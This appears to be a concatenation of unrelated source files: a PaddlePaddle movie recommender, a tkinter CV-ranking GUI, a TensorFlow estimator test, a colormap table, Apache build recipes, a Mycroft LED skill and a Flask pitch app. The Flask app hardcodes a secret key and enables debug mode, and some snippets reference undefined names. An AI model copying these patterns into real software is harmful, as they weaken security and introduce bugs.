)
total = plugins_updates.metadata.pagination.total
print_data(
PLUGINS_UPDATE_COLUMNS, plugins_updates, 'Plugins updates:')
logger.info('Showing {0} of {1} plugins updates'.format(
len(plugins_updates), total))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Authors: fuqiang(<EMAIL>)
Date: 2017/11/29
使用paddle框架实现个性化电影推荐系统的模型训练和参数输出保存,关键步骤如下:
1.初始化
2.配置网络结构和设置参数:
- 构造用户融合特征模型
- 构造电影融合特征模型
- 定义特征相似性度量inference
- 成本函数cost
- 创建parameters
- 定义feeding
3.定义event_handler
4.定义trainer
5.开始训练
6.展示cost曲线plot_costs()
"""
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import paddle.v2 as paddle
matplotlib.use('Agg')
LEARNING_STEP = 0
def get_usr_combined_features():
"""
构造用户融合特征模型,融合特征包括:
user_id:用户编号
gender_id:性别类别编号
age_id:年龄分类编号
job_id:职业类别编号
以上特征信息从数据集中读取后分别变换成对应词向量,再输入到全连接层
所有的用户特征再输入到一个全连接层中,将所有特征融合为一个200维的特征
Args:
Return:
usr_combined_features -- 用户融合特征模型
"""
# 读取用户编号信息(user_id)
uid = paddle.layer.data(
name='user_id',
type=paddle.data_type.integer_value(
paddle.dataset.movielens.max_user_id() + 1))
# 将用户编号变换为对应词向量
usr_emb = paddle.layer.embedding(input=uid, size=32)
# 将用户编号对应词向量输入到全连接层
usr_fc = paddle.layer.fc(input=usr_emb, size=32)
# 读取用户性别类别编号信息(gender_id)并做处理(同上)
usr_gender_id = paddle.layer.data(
name='gender_id', type=paddle.data_type.integer_value(2))
usr_gender_emb = paddle.layer.embedding(input=usr_gender_id, size=16)
usr_gender_fc = paddle.layer.fc(input=usr_gender_emb, size=16)
# 读取用户年龄类别编号信息(age_id)并做处理(同上)
usr_age_id = paddle.layer.data(
name='age_id',
type=paddle.data_type.integer_value(
len(paddle.dataset.movielens.age_table)))
usr_age_emb = paddle.layer.embedding(input=usr_age_id, size=16)
usr_age_fc = paddle.layer.fc(input=usr_age_emb, size=16)
# 读取用户职业类别编号信息(job_id)并做处理(同上)
usr_job_id = paddle.layer.data(
name='job_id',
type=paddle.data_type.integer_value(
paddle.dataset.movielens.max_job_id() + 1))
usr_job_emb = paddle.layer.embedding(input=usr_job_id, size=16)
usr_job_fc = paddle.layer.fc(input=usr_job_emb, size=16)
# 所有的用户特征再输入到一个全连接层中,完成特征融合
usr_combined_features = paddle.layer.fc(
input=[usr_fc, usr_gender_fc, usr_age_fc, usr_job_fc],
size=200,
act=paddle.activation.Tanh())
return usr_combined_features
def get_mov_combined_features():
"""
构造电影融合特征模型,融合特征包括:
movie_id:电影编号
category_id:电影类别编号
movie_title:电影名
以上特征信息经过相应处理后再输入到一个全连接层中,
将所有特征融合为一个200维的特征
Args:
Return:
mov_combined_features -- 电影融合特征模型
"""
movie_title_dict = paddle.dataset.movielens.get_movie_title_dict()
# 读取电影编号信息(movie_id)
mov_id = paddle.layer.data(
name='movie_id',
type=paddle.data_type.integer_value(
paddle.dataset.movielens.max_movie_id() + 1))
# 将电影编号变换为对应词向量
mov_emb = paddle.layer.embedding(input=mov_id, size=32)
# 将电影编号对应词向量输入到全连接层
mov_fc = paddle.layer.fc(input=mov_emb, size=32)
# 读取电影类别编号信息(category_id)
mov_categories = paddle.layer.data(
name='category_id',
type=paddle.data_type.sparse_binary_vector(
len(paddle.dataset.movielens.movie_categories())))
# 将电影编号信息输入到全连接层
mov_categories_hidden = paddle.layer.fc(input=mov_categories, size=32)
# 读取电影名信息(movie_title)
mov_title_id = paddle.layer.data(
name='movie_title',
type=paddle.data_type.integer_value_sequence(len(movie_title_dict)))
# 将电影名变换为对应词向量
mov_title_emb = paddle.layer.embedding(input=mov_title_id, size=32)
# 将电影名对应词向量输入到卷积网络生成电影名时序特征
mov_title_conv = paddle.networks.sequence_conv_pool(
input=mov_title_emb, hidden_size=32, context_len=3)
# 所有的电影特征再输入到一个全连接层中,完成特征融合
mov_combined_features = paddle.layer.fc(
input=[mov_fc, mov_categories_hidden, mov_title_conv],
size=200,
act=paddle.activation.Tanh())
return mov_combined_features
def network_config():
"""
配置网络结构
Args:
Return:
inference -- 相似度
cost -- 损失函数
parameters -- 模型参数
feeding -- 数据映射,python字典
"""
# 构造用户融合特征,电影融合特征
usr_combined_features = get_usr_combined_features()
mov_combined_features = get_mov_combined_features()
# 计算用户融合特征和电影融合特征的余弦相似度
inference = paddle.layer.cos_sim(
a=usr_combined_features, b=mov_combined_features, size=1, scale=5)
# 定义成本函数为均方误差函数
cost = paddle.layer.square_error_cost(
input=inference,
label=paddle.layer.data(
name='score', type=paddle.data_type.dense_vector(1)))
# 利用cost创建parameters
parameters = paddle.parameters.create(cost)
# 数据层和数组索引映射,用于trainer训练时读取数据
feeding = {
'user_id': 0,
'gender_id': 1,
'age_id': 2,
'job_id': 3,
'movie_id': 4,
'category_id': 5,
'movie_title': 6,
'score': 7
}
data = [inference, cost, parameters, feeding]
return data
def plot_costs(train_costs, train_step, test_costs, test_step):
"""
利用costs展示模型的训练测试曲线
Args:
train_costs -- 记录了训练过程的cost变化的list,每100次迭代记录一次
train_step -- 记录了训练过程迭代次数的list
test_costs -- 记录了测试过程的cost变化的list,每3500次迭代记录一次
test_step -- 记录了测试过程迭代次数的list
Return:
"""
train_costs = np.squeeze(train_costs)
test_costs = np.squeeze(test_costs)
plt.figure()
plt.plot(train_step, train_costs, label="Train Cost")
plt.plot(test_step, test_costs, label="Test Cost")
plt.ylabel('cost')
plt.xlabel('iterations (step)')
plt.title("train-test-cost")
plt.legend()
plt.show()
plt.savefig('train_test_cost.png')
def main():
"""
程序入口,包括定义神经网络结构,训练网络等
"""
# 初始化,设置为不使用GPU
paddle.init(use_gpu=False)
# 配置网络结构
inference, cost, parameters, feeding = network_config()
# 记录cost和step
train_costs = []
test_costs = []
train_step = []
test_step = []
"""
定义模型训练器,配置三个参数
cost:成本函数
parameters:参数
update_equation:更新公式(模型采用Adam方法优化更新,并初始化学习率)
"""
trainer = paddle.trainer.SGD(
cost=cost,
parameters=parameters,
update_equation=paddle.optimizer.Adam(learning_rate=1e-4))
# 事件处理模块
def event_handler(event):
"""
事件处理器,可以根据训练过程的信息作相应操作
Args:
event -- 事件对象,包含event.pass_id, event.batch_id, event.cost等信息
Return:
"""
global LEARNING_STEP
if isinstance(event, paddle.event.EndIteration):
# 每100个batch输出一条记录,分别是当前的迭代次数编号,batch编号和对应损失值
if event.batch_id % 100 == 0:
print "Pass %d Batch %d Cost %.2f" % (
event.pass_id, event.batch_id, event.cost)
# 添加训练数据的cost绘图数据
train_costs.append(event.cost)
train_step.append(LEARNING_STEP)
LEARNING_STEP += 1
if isinstance(event, paddle.event.EndPass):
# 保存参数至文件
with open('params_pass_%d.tar' % event.pass_id, 'w') as param_f:
trainer.save_parameter_to_tar(param_f)
# 利用测试数据进行测试
result = trainer.test(reader=paddle.batch(
paddle.dataset.movielens.test(), batch_size=128))
print "Test with Pass %d, Cost %f" % (
event.pass_id, result.cost)
# 添加测试数据的cost绘图数据
test_costs.append(result.cost)
test_step.append(LEARNING_STEP)
"""
模型训练
paddle.batch(reader(), batch_size=256):
表示从打乱的数据中再取出batch_size=256大小的数据进行一次迭代训练
paddle.reader.shuffle(train(), buf_size=8192):
表示trainer从train()这个reader中读取了buf_size=8192大小的数据并打乱顺序
event_handler:事件管理机制,可以自定义event_handler,根据事件信息作相应的操作
下方代码中选择的是event_handler_plot函数
feeding:
用到了之前定义的feeding索引,将数据层信息输入trainer
num_passes:
定义训练的迭代次数
"""
trainer.train(
reader=paddle.batch(
paddle.reader.shuffle(
paddle.dataset.movielens.train(), buf_size=8192),
batch_size=256),
event_handler=event_handler,
feeding=feeding,
num_passes=10)
# 展示学习曲线
# plot_costs(train_costs, train_step, test_costs, test_step)
if __name__ == '__main__':
main()
|
from tkinter import*
from tkinter import StringVar, ttk
from communicationInformation import communicationInformation
from CVManager import CVManager
from tkinter import filedialog
from buttonHandler import buttonHandler
class GUI:
def __init__(self,root):
self.passingInfo=communicationInformation()
self.root=root
self.run=False
self.frame = Frame()
self.frame.pack(fill=X)
self.directoryLabel = Label(self.frame,text="Path", width=10)
self.directoryLabel.pack(side=LEFT)
self.directoryEntry = Entry(self.frame,width=100)
self.directoryEntry.pack(side=LEFT, padx=0,pady=10 ,expand=True)
self.addDirectoryButton = Button(self.root, text =" Add ",command=self.pathAdd)
self.addDirectoryButton.pack(padx=5,pady=10)
self.buttonList=None
self.jobReqFrame = Frame()
self.jobReqFrame.pack(side=LEFT,fill=X)
self.jobRequirementLabel = Label(self.jobReqFrame, text="Jobs Requirements", width=50)
self.jobRequirementLabel.pack(expand=True, padx=5, pady=5)
self.relevantWordsText = Text(self.jobReqFrame,width=40,height=15)
self.relevantWordsText.pack( side=LEFT,pady=5, padx=5)
self.relevantWordsText.insert('1.0',' '.join(self.passingInfo.relevantWords))
self.CVTitleFrame=Frame()
self.CVTitleFrame.pack(fill=X)
self.CVTitleLabel = Label(self.CVTitleFrame, text="Selecte Post", width=50)
self.CVTitleLabel.pack( anchor=N, padx=0, pady=0)
self.topCVDisplay = Frame()
self.topCVDisplay.pack(fill=X,padx=50)
self.box_value = StringVar()
self.box = ttk.Combobox(self.topCVDisplay, textvariable=self.box_value,state='readonly')
self.box['values'] = ( 'animator','webDeveloper','SoftwareDeveloper','')
self.box.grid(column=0, row=0)
#process button
self.processButton = Button(self.jobReqFrame, text =" Process ",command=self.processExe)
self.processButton.pack(side=LEFT,padx=10,pady=10)
self.analyze=None
self.exitButton = Button(self.root, text =" Exit ",command=self.root.destroy)
self.exitButton.pack(side=LEFT,padx=10,pady=10)
self.manager=CVManager()
def pathAdd(self):
directoryPath=filedialog.askdirectory()
self.directoryEntry.insert(0, directoryPath)
def processExe(self):
if(not(self.run)):
self.passingInfo.directoryPath=self.directoryEntry.get()
self.passingInfo.jobSelected=self.box.get()
# self.passingInfo.relevantWords=self.relevantWordsText.get('1.0',END).strip().split(" ")
# if self.passingInfo.relevantWords:
# if self.passingInfo.jobSelected:
# if self.passingInfo.directoryPath:
# self.passingInfo.workFlow=True
if self.passingInfo.workFlow:
try:
self.run=True
#print(self.passingInfo.relevantWords)
self.manager.list_CVs(self.passingInfo.directoryPath)
self.manager.collectCV()
self.manager.findDocumentMatrix(None,self.passingInfo.relevantWords)
self.manager.clusterData()
self.manager.rankCV()
self.manager.showAnalytics()
self.manager.orderedCVList=self.manager.showTopCVPerPost(self.passingInfo.jobSelected)
#self.manager.compareCV()
self.analyze = Button(self.root, text ="analyze",command=self.analyzeCV)
self.analyze.pack(side=LEFT,padx=10,pady=10)
self.createLinkToCV(self.manager.orderedCVList)
except Exception as e:
print("error")
print("processing \t"+str(e))
else:
print("select all necessary info")
else:
try:
self.passingInfo.jobSelected=self.box.get()
self.manager.orderedCVList=self.manager.showTopCVPerPost(self.passingInfo.jobSelected)
self.buttonList.destoringButtons()
self.createLinkToCV(self.manager.orderedCVList)
#self.manager.compareCV()
except Exception as e:
print("error")
print("processing second time \t"+str(e))
def createLinkToCV(self,dataList):
self.buttonList=buttonHandler(self.root,dataList)
def analyzeCV(self):
self.manager.compareCV()
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Test for estimator loss."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
import tensorflow as tf
from tensorflow.python.platform import test
import epl
from estimator_test import capture_log
from estimator_test import input_fn
from estimator_test import model_fn
from test_utils import fix_randomness
# pylint: disable=missing-docstring,unused-variable
# pylint: disable=protected-access
class EstimatorTest(test.TestCase):
def test_compare_with_mirrorstrategy(self):
fix_randomness()
log_stream = capture_log()
model_dir = tempfile.mkdtemp()
max_steps = 10
seed = 123123
batch = 2
distribution_strategy = tf.contrib.distribute.MirroredStrategy(num_gpus=2)
run_config = tf.estimator.RunConfig(train_distribute=distribution_strategy, tf_random_seed=seed,
log_step_count_steps=1)
estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
estimator.train(lambda: input_fn(batch), max_steps=max_steps)
logs = log_stream.getvalue()
losses = [float(line.replace(',', ' ').split()[2]) for line in logs.strip().split('\n') if 'loss =' in line]
res1 = [line.split(':')[-1] for line in logs.strip().split('\n') if 'loss =' in line]
losses = [float(r.split(',')[0].split()[2]) for r in res1]
shutil.rmtree(model_dir)
log_stream.truncate(0)
fix_randomness()
epl.init()
epl.set_default_strategy(epl.replicate(1))
model_dir = tempfile.mkdtemp()
run_config = tf.estimator.RunConfig(tf_random_seed=seed, log_step_count_steps=1)
estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
estimator.train(lambda: input_fn(batch, False), max_steps=max_steps)
logs = log_stream.getvalue()
res2 = [line.split(':')[-1] for line in logs.strip().split('\n') if 'loss =' in line]
losses2 = [float(r.split(',')[0].split()[2]) for r in res2]
self.assertEqual(len(losses), len(losses2))
for i, loss in enumerate(losses):
self.assertTrue(abs(loss - losses2[i]) < 1e-6)
shutil.rmtree(model_dir)
def test_ignore_mirrorstrategy(self):
log_stream = capture_log()
model_dir = tempfile.mkdtemp()
max_steps = 10
seed = 123123
batch = 2
fix_randomness()
distribution_strategy = tf.contrib.distribute.MirroredStrategy(num_gpus=2)
run_config = tf.estimator.RunConfig(train_distribute=distribution_strategy, tf_random_seed=seed,
log_step_count_steps=1)
estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
estimator.train(lambda: input_fn(batch), max_steps=max_steps)
logs = log_stream.getvalue()
losses = [float(line.replace(',', ' ').split()[2]) for line in logs.strip().split('\n') if 'loss =' in line]
res1 = [line.split(':')[-1] for line in logs.strip().split('\n') if 'loss =' in line]
# pylint: enable=missing-docstring,unused-variable
# pylint: enable=protected-access
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
test.main()
|
import numpy
RdYlGn = numpy.array([
[0.64705882, 0., 0.14901961, 1.],
[0.66243752, 0.01476355, 0.14932718, 1.],
[0.68550557, 0.03690888, 0.14978854, 1.],
[0.70088428, 0.05167243, 0.15009612, 1.],
[0.72395233, 0.07381776, 0.15055748, 1.],
[0.73933103, 0.08858131, 0.15086505, 1.],
[0.76239908, 0.11072664, 0.15132641, 1.],
[0.78546713, 0.13287197, 0.15178777, 1.],
[0.80084583, 0.14763552, 0.15209535, 1.],
[0.82391388, 0.16978085, 0.15255671, 1.],
[0.83929258, 0.18454441, 0.15286428, 1.],
[0.85428681, 0.21168781, 0.16370627, 1.],
[0.86766628, 0.23983083, 0.17662438, 1.],
[0.87658593, 0.25859285, 0.18523645, 1.],
[0.8899654, 0.28673587, 0.19815456, 1.],
[0.89888504, 0.30549789, 0.20676663, 1.],
[0.91226451, 0.33364091, 0.21968474, 1.],
[0.92118416, 0.35240292, 0.22829681, 1.],
[0.93456363, 0.38054594, 0.24121492, 1.],
[0.9479431, 0.40868897, 0.25413303, 1.],
[0.95686275, 0.42745098, 0.2627451, 1.],
[0.96101499, 0.45743945, 0.27658593, 1.],
[0.96378316, 0.47743176, 0.28581315, 1.],
[0.96793541, 0.50742022, 0.29965398, 1.],
[0.97208766, 0.53740869, 0.31349481, 1.],
[0.97485582, 0.557401, 0.32272203, 1.],
[0.97900807, 0.58738947, 0.33656286, 1.],
[0.98177624, 0.60738178, 0.34579008, 1.],
[0.98592849, 0.63737024, 0.35963091, 1.],
[0.98869666, 0.65736255, 0.36885813, 1.],
[0.99223376, 0.68619762, 0.38362168, 1.],
[0.99269512, 0.70926567, 0.40299885, 1.],
[0.99300269, 0.72464437, 0.41591696, 1.],
[0.99346405, 0.74771242, 0.43529412, 1.],
[0.99377163, 0.76309112, 0.44821223, 1.],
[0.99423299, 0.78615917, 0.46758939, 1.],
[0.99469435, 0.80922722, 0.48696655, 1.],
[0.99500192, 0.82460592, 0.49988466, 1.],
[0.99546328, 0.84767397, 0.51926182, 1.],
[0.99577086, 0.86305267, 0.53217993, 1.],
[0.99623222, 0.88319877, 0.55309496, 1.],
[0.99669358, 0.89750096, 0.57708574, 1.],
[0.99700115, 0.90703576, 0.59307958, 1.],
[0.99746251, 0.92133795, 0.61707036, 1.],
[0.99777009, 0.93087274, 0.63306421, 1.],
[0.99823145, 0.94517493, 0.65705498, 1.],
[0.99853902, 0.95470973, 0.67304883, 1.],
[0.99900038, 0.96901192, 0.6970396, 1.],
[0.99946175, 0.98331411, 0.72103037, 1.],
[0.99976932, 0.9928489, 0.73702422, 1.],
[0.99123414, 0.99630911, 0.73702422, 1.],
[0.97954633, 0.99138793, 0.72103037, 1.],
[0.96201461, 0.98400615, 0.6970396, 1.],
[0.94448289, 0.97662438, 0.67304883, 1.],
[0.93279508, 0.97170319, 0.65705498, 1.],
[0.91526336, 0.96432141, 0.63306421, 1.],
[0.90357555, 0.95940023, 0.61707036, 1.],
[0.88604383, 0.95201845, 0.59307958, 1.],
[0.87435602, 0.94709727, 0.57708574, 1.],
[0.8568243, 0.93971549, 0.55309496, 1.],
[0.83529412, 0.93048827, 0.5349481, 1.],
[0.81960784, 0.92372165, 0.52479815, 1.],
[0.79607843, 0.9135717, 0.50957324, 1.],
[0.78039216, 0.90680507, 0.4994233, 1.],
[0.75686275, 0.89665513, 0.48419839, 1.],
[0.73333333, 0.88650519, 0.46897347, 1.],
[0.71764706, 0.87973856, 0.45882353, 1.],
[0.69411765, 0.86958862, 0.44359862, 1.],
[0.67843137, 0.86282199, 0.43344867, 1.],
[0.65490196, 0.85267205, 0.41822376, 1.],
[0.62637447, 0.8402153, 0.412995, 1.],
[0.60668973, 0.83160323, 0.41084198, 1.],
[0.57716263, 0.81868512, 0.40761246, 1.],
[0.55747789, 0.81007305, 0.40545944, 1.],
[0.52795079, 0.79715494, 0.40222991, 1.],
[0.50826605, 0.78854287, 0.40007689, 1.],
[0.47873895, 0.77562476, 0.39684737, 1.],
[0.44921184, 0.76270665, 0.39361784, 1.],
[0.4295271, 0.75409458, 0.39146482, 1.],
[0.4, 0.74117647, 0.38823529, 1.],
[0.37662438, 0.72979623, 0.38239139, 1.],
[0.34156094, 0.71272587, 0.37362553, 1.],
[0.3064975, 0.69565552, 0.36485967, 1.],
[0.28312188, 0.68427528, 0.35901576, 1.],
[0.24805844, 0.66720492, 0.3502499, 1.],
[0.22468281, 0.65582468, 0.344406, 1.],
[0.18961938, 0.63875433, 0.33564014, 1.],
[0.16624375, 0.62737409, 0.32979623, 1.],
[0.13118032, 0.61030373, 0.32103037, 1.],
[0.09996155, 0.59238754, 0.31180315, 1.],
[0.09196463, 0.57762399, 0.3041138, 1.],
[0.07996924, 0.55547866, 0.29257978, 1.],
[0.07197232, 0.54071511, 0.28489043, 1.],
[0.05997693, 0.51856978, 0.2733564, 1.],
[0.04798155, 0.49642445, 0.26182238, 1.],
[0.03998462, 0.4816609, 0.25413303, 1.],
[0.02798923, 0.45951557, 0.242599, 1.],
[0.01999231, 0.44475202, 0.23490965, 1.],
[0.00799692, 0.42260669, 0.22337562, 1.],
[0., 0.40784314, 0.21568627, 1.]
])
def colormap(value, palette=RdYlGn):
index = min(99, max(0, round(value*100)))
rgba = (palette[index]*256).astype(int)
rgba[-1] = palette[index][-1]
return rgba
|
import os
import shutil
from ..package import Package
from ..util import run, download, require_program, param_attrs
class APR(Package):
"""
The Apache Portable Runtime.
:identifier: apr-<version>
:param version: version to download
"""
def __init__(self, version: str):
self.version = version
def ident(self):
return 'apr-' + self.version
def fetch(self, ctx):
_fetch_and_unpack(ctx, 'apr', 'apr-' + self.version)
def build(self, ctx):
os.makedirs('obj', exist_ok=True)
os.chdir('obj')
if not os.path.exists('Makefile'):
run(ctx, ['../src/configure',
'--prefix=' + self.path(ctx, 'install')])
run(ctx, 'make -j%d' % ctx.jobs)
def install(self, ctx):
os.chdir('obj')
run(ctx, 'make install')
def is_fetched(self, ctx):
return os.path.exists('src')
def is_built(self, ctx):
return os.path.exists('obj/apr-1-config')
def is_installed(self, ctx):
return os.path.exists('install/bin/apr-1-config')
def config_path(self, ctx):
return self.path(ctx, 'install', 'bin', 'apr-1-config')
class APRUtil(Package):
"""
The Apache Portable Runtime utilities.
:identifier: apr-util-<version>
:param version: version to download
:param apr: APR package to depend on
"""
@param_attrs
def __init__(self, version: str, apr: APR):
pass
def dependencies(self):
yield self.apr
def ident(self):
return 'apr-util-' + self.version
def fetch(self, ctx):
_fetch_and_unpack(ctx, 'apr', 'apr-util-' + self.version)
def build(self, ctx):
os.makedirs('obj', exist_ok=True)
os.chdir('obj')
if not os.path.exists('Makefile'):
run(ctx, ['../src/configure',
'--prefix=' + self.path(ctx, 'install'),
'--with-apr=' + self.apr.config_path(ctx)])
run(ctx, 'make -j%d' % ctx.jobs)
def install(self, ctx):
os.chdir('obj')
run(ctx, 'make install')
def is_fetched(self, ctx):
return os.path.exists('src')
def is_built(self, ctx):
return os.path.exists('obj/apu-1-config')
def is_installed(self, ctx):
return os.path.exists('install/bin/apu-1-config')
def config_path(self, ctx):
return self.path(ctx, 'install', 'bin', 'apu-1-config')
class ApacheBench(Package):
"""
Apache's ``ab`` benchmark.
:identifier: ab-<version>
:param httpd_version: httpd version
:param apr: APR package to depend on
:param apr_util: APR utilities package to depend on
"""
@param_attrs
def __init__(self, httpd_version: str, apr: APR, apr_util: APRUtil):
pass
def dependencies(self):
yield self.apr
yield self.apr_util
def ident(self):
return 'ab-' + self.httpd_version
def fetch(self, ctx):
_fetch_and_unpack(ctx, 'httpd', 'httpd-' + self.httpd_version)
def build(self, ctx):
os.makedirs('obj', exist_ok=True)
os.chdir('obj')
if not os.path.exists('Makefile'):
run(ctx, ['../src/configure',
'--prefix=' + self.path(ctx, 'install'),
'--with-apr=' + self.apr.config_path(ctx),
'--with-apr-util=' + self.apr_util.config_path(ctx)])
run(ctx, 'make -C support TARGETS=ab')
def install(self, ctx):
os.makedirs('install/bin', exist_ok=True)
shutil.copy('obj/support/ab', 'install/bin')
def is_fetched(self, ctx):
return os.path.exists('src')
def is_built(self, ctx):
return os.path.exists('obj/support/ab')
def is_installed(self, ctx):
return os.path.exists('install/bin/ab')
@classmethod
def default(cls, httpd_version='2.4.41',
apr_version='1.7.0',
apr_util_version='1.6.1'):
"""
Create a package with default versions for all dependencies.
:param httpd_version: httpd version
:param apr_version: APR version
:param apr_util_version: APR utilities version
"""
apr = APR(apr_version)
apr_util = APRUtil(apr_util_version, apr)
return cls(httpd_version, apr, apr_util)
def _fetch_and_unpack(ctx, repo, basename):
require_program(ctx, 'tar', 'required to unpack source tarfile')
tarname = basename + '.tar.bz2'
download(ctx, 'http://apache.cs.uu.nl/%s/%s' % (repo, tarname))
run(ctx, ['tar', '-xf', tarname])
shutil.move(basename, 'src')
os.remove(tarname)
|
<filename>__init__.py
import time
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill, intent_handler
from adapt.intent import IntentBuilder
from mycroft.util.log import LOG
from mycroft import intent_file_handler
from apa102_pi.colorschemes import colorschemes
from apa102_pi.driver import apa102
NUM_LED = 12
MOSI = 23 # Hardware SPI uses BCM 10 & 11. Change these values for bit bang mode
SCLK = 24 # e.g. MOSI = 23, SCLK = 24 for Pimoroni Phat Beat or Blinkt!
class Geekworm_LED_ring(MycroftSkill):
def __init__(self):
super(Geekworm_LED_ring, self).__init__(name="Geekworm_LED_ring")
def initialize(self):
self.log.info("Pixel Ring: Initializing")
self.enable()
def enable(self):
self.log.info("Pixel Ring: Enabling")
self.add_event('recognizer_loop:wakeword',
self.handle_listener_wakeup)
self.add_event('recognizer_loop:record_end',
self.handle_listener_off)
self.add_event('mycroft.skill.handler.start',
self.handle_listener_think)
self.add_event('mycroft.skill.handler.complete',
self.handle_listener_off)
self.add_event('recognizer_loop:audio_output_start',
self.handler_listener_speak)
self.add_event('recognizer_loop:audio_output_end',
self.handle_listener_off)
self.led = apa102.APA102(num_led=NUM_LED, order='rgb', mosi=MOSI, sclk=SCLK)
self.led.clear_strip()
self.led.set_global_brightness(11)
def disable(self):
self.log.info("Pixel Ring: Disabling")
self.remove_event('recognizer_loop:wakeup')
self.remove_event('recognizer_loop:record_end')
self.remove_event('recognizer_loop:audio_output_start')
self.remove_event('recognizer_loop:audio_output_end')
self.remove_event('mycroft.skill.handler.start')
self.remove_event('mycroft.skill.handler.complete')
def shutdown(self):
self.log.info("Pixel Ring: Shutdown")
self.led.cleanup(led)
def handle_listener_wakeup(self, message):
self.log.info("Pixel Ring: Wakeup")
for self.x in range(12):
self.led.set_pixel_rgb(self.x, 0x00FF00)
self.led.show()
def handle_listener_off(self, message):
self.log.info("Pixel Ring: Off")
self.led.clear_strip()
def handle_listener_think(self, message):
self.log.info("Pixel Ring: Think")
for self.x in range(12):
self.led.set_pixel_rgb(self.x, 0xFF0000)
self.led.show()
def handler_listener_speak(self, message):
self.log.info("Pixel Ring: Speak")
for self.x in range(12):
self.led.set_pixel_rgb(self.x, 0x0000FF)
self.led.show()
@intent_handler(IntentBuilder("").require("EnablePixelRing"))
def handle_enable_pixel_ring_intent(self, message):
self.enable()
self.speak_dialog("EnablePixelRing")
@intent_handler(IntentBuilder("").require("DisablePixelRing"))
def handle_disable_pixel_ring_intent(self, message):
self.disable()
self.speak_dialog("DisablePixelRing")
def create_skill():
return Geekworm_LED_ring()
|
from flask import Flask, render_template, url_for, request, redirect, url_for, abort
from .forms import PitchForm, UpdateProfile
from . import main
from ..models import User,Pitch
# Pitch, Comments, PitchCategory, Votes
from flask_login import login_required, current_user
from .. import db,photos
#db
app = Flask(__name__)
app.config['SECRET_KEY']= 'mine101'
@main.route('/')
def index():
pitch = Pitch.query.order_by('posted').all()
# all_category = PitchCategory.get_categories()
# all_pitches = Pitch.query.order_by('id').all()
# print(all_pitches)
title = 'Welcome'
return render_template('index.html', title = title, pitch=pitch)
#Route for adding a new pitch
@main.route('/pitch/new/<int:id>', methods=['GET', 'POST'])
@login_required
def new_pitch(id):
form = PitchForm()
if form.validate_on_submit():
content = form.content.data
new_pitch= Pitch(content=content, user_id = current_user.id)
new_pitch.save_pitch()
return redirect(url_for('.index', ))
return render_template('new_pitch.html', pitch_form=form)
@main.route('/user/<uname>')
def profile(uname):
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
return render_template("profile/profile.html", user = user)
@main.route('/user/<uname>/update',methods = ['GET','POST'])
@login_required
def update_profile(uname):
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
form = UpdateProfile()
if form.validate_on_submit():
user.bio = form.bio.data
db.session.add(user)
db.session.commit()
return redirect(url_for('.profile',uname=user.username))
return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/pic',methods= ['POST'])
@login_required
def update_pic(uname):
user = User.query.filter_by(username = uname).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',uname=uname))
@app.route("/home/")
def home():
return render_template('index.html', pitchs=pitchs)
@main.route("/about")
def about():
return render_template('about.html',title='About')
if __name__ =='__main__':
app.run(debug=True)
# @main.route("/register", methods=['GET', 'POST'])
# def register():
# # if request.method == 'POST'
# # return do_login()
# # else:
# # return LoginForm()
# form = RegisterForm()
# return render_template('register.html', title='Register', forms=forms )
# @main.route("/login")
# def login():
# form = LoginForm()
# return render_template('login.html', title='Login' , forms=forms)
# @main.route('/categories/<int:id>')
# def category(id):
# category = PitchCategory.query.get(id)
# if category is None:
# abort(404)
# pitches=Pitch.get_pitches(id)
# return render_template('category.html', pitches=pitches, category=category)
# @main.route('/add/category', methods=['GET','POST'])
# @login_required
# def new_category():
# """
# View new group route function that returns a page with a form to create a category
# """
# form = CategoryForm()
# if form.validate_on_submit():
# name = form.name.data
# new_category = PitchCategory(name = name)
# new_category.save_category()
# return redirect(url_for('.index'))
# title = 'New category'
# return render_template('new_category.html', category_form = form, title = title)
#view single pitch alongside its comments
# @main.route('/view_pitch/<int:id>', methods=['GET', 'POST'])
# @login_required
# def view_pitch(id):
# """
# Function the returns a single pitch for a comment to be added
# """
# all_category = PitchCategory.get_categories()
# pitches = Pitch.query.get(id)
# # pitches = Pitch.query.filter_by(id=id).all()
# if pitches is None:
# abort(404)
# comment = Comments.get_comments(id)
# count_likes = Votes.query.filter_by(pitches_id=id, vote=1).all()
# count_dislikes = Votes.query.filter_by(pitches_id=id, vote=2).all()
# return render_template('view-pitch.html', pitches = pitches, comment = comment, count_likes=len(count_likes), count_dislikes=len(count_dislikes), category_id = id, categories=all_category)
#adding a comment
# @main.route('/write_comment/<int:id>', methods=['GET', 'POST'])
# @login_required
# def post_comment(id):
# """
# Function to post comments
# """
# form = CommentForm()
# title = 'post comment'
# pitches = Pitch.query.filter_by(id=id).first()
# if pitches is None:
# abort(404)
# if form.validate_on_submit():
# opinion = form.opinion.data
# new_comment = Comments(opinion = opinion, user_id = current_user.id, pitches_id = pitches.id)
# new_comment.save_comment()
# return redirect(url_for('.view_pitch', id = pitches.id))
# return render_template('post_comment.html', comment_form = form, title = title)
#Routes upvoting/downvoting pitches
# @main.route('/pitch/upvote/<int:id>&<int:vote_type>')
# @login_required
# def upvote(id,vote_type):
# """
# View function that adds one to the vote_number column in the votes table
# """
# # Query for user
# votes = Votes.query.filter_by(user_id=current_user.id).all()
# print(f'The new vote is {votes}')
# to_str=f'{vote_type}:{current_user.id}:{id}'
# print(f'The current vote is {to_str}')
